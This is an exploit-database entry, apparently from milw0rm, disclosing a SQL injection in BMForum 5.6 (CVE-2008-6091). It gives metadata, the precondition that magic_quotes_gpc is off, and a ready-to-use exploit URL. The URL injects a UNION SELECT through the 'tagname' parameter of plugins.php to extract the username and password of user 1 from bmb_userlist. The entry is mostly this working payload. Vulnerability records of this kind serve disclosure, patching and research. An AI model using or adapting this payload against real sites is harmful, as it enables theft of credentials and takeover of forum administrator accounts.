BMForum 5.6 - 'tagname' SQL Injection

Author: ~!Dok_tOR!~
type: webapps
platform: php
port: 
date_added: 2008-09-30 
date_updated: 2016-12-23 
verified: 1 
codes: OSVDB-51848;CVE-2008-6091 
tags: 
aliases:  
screenshot_url:  
application_url: 

Author: ~!Dok_tOR!~
Date found: 30.09.08
Product: BMForum
Version: 5.6
URL: www.bmforum.com
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit:

http://localhost/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1'+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/*

# milw0rm.com [2008-10-01]